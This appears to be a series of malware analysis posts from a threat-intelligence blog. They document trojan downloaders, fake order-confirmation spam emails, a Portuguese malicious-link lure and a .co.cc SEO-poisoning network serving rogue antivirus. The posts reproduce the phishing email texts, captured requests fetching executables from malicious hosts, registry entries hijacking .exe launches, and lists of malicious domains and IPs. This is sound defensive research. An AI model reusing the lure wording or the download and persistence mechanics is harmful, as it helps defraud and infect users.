Process Created - %SAMPLE% - C:\WINDOWS\system32\svchost.exe - Microsoft Corporation - 73955B04F209D8A1C633867841267A96 - 14336 bytes
File Deleted - C:\WINDOWS\system32\svchost.exe - %SAMPLE% - 24576 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /pusk3.exe
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\pusk3[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\pusk3[1].exe - 9A4DB26B24C1FA9F59D7005B18BF1B6E - 17408 bytes - attr: [] - -
Process Created - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\pusk3.exe - Microsoft Corporation - AFFF69E592B133B34B0FD2AB6AC67691 - 429056 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /trol.exe
Connection Established - %AppData%\IMPOST~1\Temp\pusk3.exe - TCP - 194.50.7.14 - 80
Web Request - %AppData%\IMPOST~1\Temp\pusk3.exe - GET - searcham.org - /404.php?type=stats&affid=531&subid=03&iruns
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\trol[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\trol[1].exe - 2984C3FF08E69000E841BF48436C55C9 - 66560 bytes - attr: [] - -
File Created - %AppData%\IMPOST~1\Temp\pusk3.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\404[1].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - 14/06/2011 11.46.01 - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\trol.exe - Unknown Publisher - F6C7505CC989D824EE2B6961F5EE1C2C - 79360 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /trol2.exe
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\DX0O3V3I\trol2[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\DX0O3V3I\trol2[1].exe - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes - attr: [] - PE
Process Created - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\trol2.exe - Unknown Publisher - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 95.64.36.67 - 80
File Created - %AppData%\IMPOST~1\Temp\trol2.exe - %Temp%\2.tmp - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes - attr: [] - PE
Connection Established - %AppData%\IMPOST~1\Temp\trol2.exe - TCP - 94.60.123.33 - 80
Connection Established - %AppData%\IMPOST~1\Temp\trol2.exe - TCP - 94.60.123.34 - 80

URLVoid domain analysis:

http://www.urlvoid.com/scan/miliardov.com
http://www.urlvoid.com/scan/searcham.org

IPVoid ipaddress analysis:

http://www.ipvoid.com/scan/85.202.146.77
http://www.ipvoid.com/scan/194.50.7.14
http://www.ipvoid.com/scan/95.64.36.67
http://www.ipvoid.com/scan/94.60.123.33
http://www.ipvoid.com/scan/94.60.123.34

Malware: Your Order No 218538 – Puremobile Inc.

Suspicious email spreading malware:

Received: from 18714128077.user.veloxzone.com.br (unknown [187.14.128.77]) 
Received: from [132.75.231.74] (helo=qnmekzdssguat.bacphgvlbnez.ua)
From: "Puremobile Inc." <h5923a@ms2.hinet.net>
Subject: Your Order No 218538 - Puremobile Inc.

Message:

Thank you for ordering from Puremobile Inc.
 
This message is to inform you that your order has been received and is currently
being processed.
 
Your order reference is 372662.
 
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
 
You have chosen to pay by credit card.
Your card will be charged for the amount of 045.00 USD and "Puremobile Inc." will
appear next to the charge on your statement.
Your purchase information appears below in the file.

Attached there is a file with ZIP extension:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-zip
File size: 7627 bytes
MD5 hash: d85180f7a74e04c9b9ef6f9bd437194d
SHA1 hash: 79763a8766773bc08f7dd309db2488f46d3f5438
Detection rate: 3 on 6 (50%)
Status: INFECTED

AVG 01/05/2011 10.0.0.1190 FakeAlert
Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-exe
File size: 18432 bytes
MD5 hash: 694a38aa76e06cebe4048260b8f0e4fa
SHA1 hash: 0e698c044e77e11e2c494ad0b2dc002f6d73dabe
Detection rate: 2 on 6 (50%)
Status: INFECTED

Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The malware creates following files:

%AppData%\kdv.exe (BE39D725BDA9A76EAB2E0F1B3FAD8FA3)

Registry entries added:

HKCU\Software\Classes\.exe\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"
 
HKCU\Software\Classes\exefile\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"

Network traffic:

GET /0014000126 HTTP/1.1
Host: hahecekis. com
 
GET /pusk.exe HTTP/1.1
Host: variantov. com
 
GET /f/g.php HTTP/1.1
Host: kkojjors. net

URLVoid domain analysis:

http://www.urlvoid.com/scan/hahecekis.net
http://www.urlvoid.com/scan/variantov.com
http://www.urlvoid.com/scan/kkojjors.net

Malware: Successfull Order 386284

Another suspicious email spreading malware:

Received: from [246.236.108.228] (helo=waeztfotlyzjd.jxokxslnvzq.org)
From: " Bobijou Inc" <premierednxez86@expdel.com>
Subject: Successfull Order 386284
Return-Path: <premierednxez86@expdel.com>

Message:

Thank you for ordering from Bobijou Inc.

This message is to inform you that your order has been received and is currently
being processed.

Your order reference is 061042.
You will need this in all correspondence.

This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.

You have chosen to pay by credit card.
Your card will be charged for the amount of 244.00 USD and

Malware: Nova cotacao…

Honeypot reported a suspicious email:

Return-Path: <apache@94.229.165.236.srvlist.ukfast.net>
Received: from 94.229.165.236.srvlist.ukfast.net (94.229.165.236.srvlist.ukfast.net [94.229.165.236])
Received: from 94.229.165.236.srvlist.ukfast.net (unknown [127.0.0.1]) by 94.229.165.236.srvlist.ukfast.net
Received: by 94.229.165.236.srvlist.ukfast.net (Postfix, from userid 48)
Subject: Nova cotacao...
Date: Tue, 26 Apr 2011 07:14:29 +0100 (BST)

This is the malicious URL contained in the message:

gwayprototype. com/support/img/thumb2.php?#documento_relatorio
HTTP/1.1 302 Object Moved
Location: http://www.abeonas. net/abnor/,,/001/PLANILHA-DOCUMENTO.scr
Server: Microsoft-IIS/4.0
Content-Type: text/html
Connection: close
Content-Length: 174

It redirects to download the infected file:

abeonas. net/abnor/,,/001/PLANILHA-DOCUMENTO.scr

Report 2011-04-25 23:05:38 (GMT 1)
File Name planilha-documento-scr
File Size 157184 bytes
File Type Executable File (EXE)
MD5 Hash 3e66cfb35fee0edeb86da90b0ef780d2
SHA1 Hash 18fdccc4927ad848e74ac742270a1673bf74c7bc
Detections: 5 / 10 (50 %)
Status INFECTED

AVG 25/04/2011 10.0.0.1190 Downloader.Rozena
Comodo 25/04/2011 4.0 TrojWare.Win32.Troja..
Emsisoft 25/04/2011 5.1.0.2 Trojan-PWS.Win32.QQR..
F-Prot 25/04/2011 6.3.3.4884 W32/SuspPack.R.gen!E..
Ikarus 25/04/2011 T31001097 Trojan-PWS.Win32.QQR..

Image of file:

Image

URLVoid domain analysis:

http://www.urlvoid.com/scan/abeonas.net
http://www.urlvoid.com/scan/gwayprototype.com

Suspicious activity for domains .co.cc

While doing some google searches for particular keywords, with a specific google search we have noted that in some cases the websites found have the same URL after the .co.cc and that all of them use a $_GET[‘k’] query related to the keyword I was searching for. Almost all the links found have also the same HTML template and they look like to be non-live websites, maybe are used to capture keywords or are related to some kind of SEO poisoning activity:

Image

The secret has been revealed:

GET /index.php?k=virus-scan HTTP/1.1
Host: liostimoremvfk.co. cc

Response:

HTTP/1.1 302 Found
Date: Tue, 19 Apr 2011 16:43:03 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Location: hxxp://includingwhich.cz. cc/in.cgi?4&seoref=[...]
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
 
....................

There is a redirect to… guess what ? A fake scanner page…

Image

Image

Is prompted a popup window to download the rogue security software setup:

Image

Network traffic:

GET /get_file.php?id=16 HTTP/1.1
Host: mywebavck-2.co. cc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
 
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:41:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Description: File Transfer
Content-Length: 331776
Content-Disposition: attachment; filename="setup.exe"
Connection: close
Content-Type: application/download
 
MZ......................@..................[...]

The setup file looks like to be almost undetected by Antiviruses:

Report date: 2011-04-19 16:51:48 (GMT 1)
File name: setup-exe
File size: 331776 bytes
MD5 hash: c6adf910c8e56b4b0577ddface41898d
SHA1 hash: 978794a9705fec3f5dd5d7256b147a75d6c6f6fe
Detection rate: 0 on 10 (0%)
Status: CLEAN

Few malicious domains .co.cc used to capture keywords:

plandicardyu9.co.cc/index.php?k=Spun
pensvernohp.co.cc/index.php?k=16-blocks-wiki
jacbocome6.co.cc/index.php?k=Pianist,-The
setibetkeee8r.co.cc/index.php?k=xXx
vacuumguide.co.cc/index.php?k=loop
vacuumreview.co.cc/index.php?k=actress
catbepow372.co.cc/index.php?k=Few-Good-Men,-A
loismolaqimvab.co.cc/index.php?k=Upside-of-Anger,-The
loismolaqimvab.co.cc/index.php?k=007-goldeneye
nutnorbntegiw0.co.cc/index.php?k=Hoodwinked!
pordisfpoc64.co.cc/index.php?k=faculty-the
bustmiswoodckosnh.co.cc/index.php?k=Webs
bustmiswoodckosnh.co.cc/index.php?k=007-The-Spy-Who-Loved-Me
lrecamac8r4.co.cc/index.php?k=Shaft
phoderadc9i.co.cc/index.php?k=Sentinel,-The
buzzpozapyq5.co.cc/index.php?k=Freedomland
tionforhardversry.co.cc/index.php?k=007-Octopussy
scesniasay3u.co.cc/index.php?k=Prince-and-Me-2,-The
rohislantsello.co.cc/index.php?k=Grind
xpowgihydreegk.co.cc/index.php?k=Gladiatress
xpowgihydreegk.co.cc/index.php?k=15-minutes-pr
buitalanbu6.co.cc/index.php?k=Ali
arenelx1l.co.cc/index.php?k=Open-Range
saduhydsp.co.cc/index.php?k=007-Goldfinger
saiclevaps1s.co.cc/index.php?k=Alien:-Resurrection
hoerhinbendescrt.co.cc/index.php?k=Core,-The
fledunoutin5t.co.cc/index.php?k=21-grams-casting-director
teoucbosonenfo.co.cc/index.php?k=Rules-of-Attraction,-The
apsagsoumyp42o.co.cc/index.php?k=Predator-2
fanbaperpeisg.co.cc/index.php?k=Dungeons
metersaddrantb7.co.cc/index.php?k=Fast-and-the-Furious,-The
ibsummabobs1q.co.cc/index.php?k=Body,-The
tingrobfoz60.co.cc/index.php?k=15-minutes-of-shame
macronessi9.co.cc/index.php?k=1941
macronessi9.co.cc/index.php?k=When-a-Stranger-Calls
filtsubscalsuvrl.co.cc/index.php?k=Die-Hard:-With-a-Vengeance
siidosantv.co.cc/index.php?k=007-Licence-to-Kill
siidosantv.co.cc/index.php?k=Get-Shorty
questeprap28.co.cc/index.php?k=Bourne-Identity,-The
geoganshi5n5.co.cc/index.php?k=Jaws-2
riapaewarmcooksbm.co.cc/index.php?k=007-live-and-let-die-online
decapivetr.co.cc/index.php?k=Changing-Lanes
ictiforkh.co.cc/index.php?k=Cheaper-by-the-Dozen
ictiforkh.co.cc/index.php?k=Spun
sandsatdar3.co.cc/index.php?k=Dances-with-Wolves
gatthanbastams.co.cc/index.php?k=Hudsucker-Proxy,-The
gatthanbastams.co.cc/index.php?k=Cellular
deathstippark1h.co.cc/index.php?k=English-Patient,-The
deathstippark1h.co.cc/index.php?k=Clerks.
crowpaetucep95m.co.cc/index.php?k=Clerks.
adefarichz.co.cc/index.php?k=Dogma
adefarichz.co.cc/index.php?k=16-blocks-review
talcoutip2y.co.cc/index.php?k=Pride
opupreggazti.co.cc/index.php?k=Fahrenheit-9/11
opupreggazti.co.cc/index.php?k=bewitched-cast
sqeestheogwenrepm83.co.cc/index.php?k=Bread-and-Roses
pekiguaningmv.co.cc/index.php?k=Rollerball
congrinaleo.co.cc/index.php?k=View-from-the-Top
cuttcanthnaznu.co.cc/index.php?k=Scream-3
kannmowarmq2.co.cc/index.php?k=Cliffhanger
gesnecalti7qc.co.cc/index.php?k=U-571
parlandcolrac1u.co.cc/index.php?k=Scream-2
rapaconptf.co.cc/index.php?k=Ali
profifreturqn.co.cc/index.php?k=007-Octopussy
dendthylthejnu.co.cc/index.php?k=Mummy,-The
ictiforkh.co.cc/index.php?k=Corky-Romano

Note that the value after k= is same as page title!

Other related malicious domains:

apsagsoumyp42o.co.cc
cklik.in
degreesupplies.cz.cc
montlimal.co.cc
optimizes.cz.cc
sadrfedwer.co.cc
talcoutip2y.co.cc
volecap.cz.cc
www.cklik.in
yhnecqapp.co.cc

All these malicious domains appear to be hosted in this IP address:

95.169.191.217
ns2.km35913.keymachine.de
95.169.160.0/19 - Keyweb AG IP Network
AS31103 - KEYWEB-AS Keyweb AG

IPVoid analysis:

http://www.ipvoid.com/scan/95.169.191.217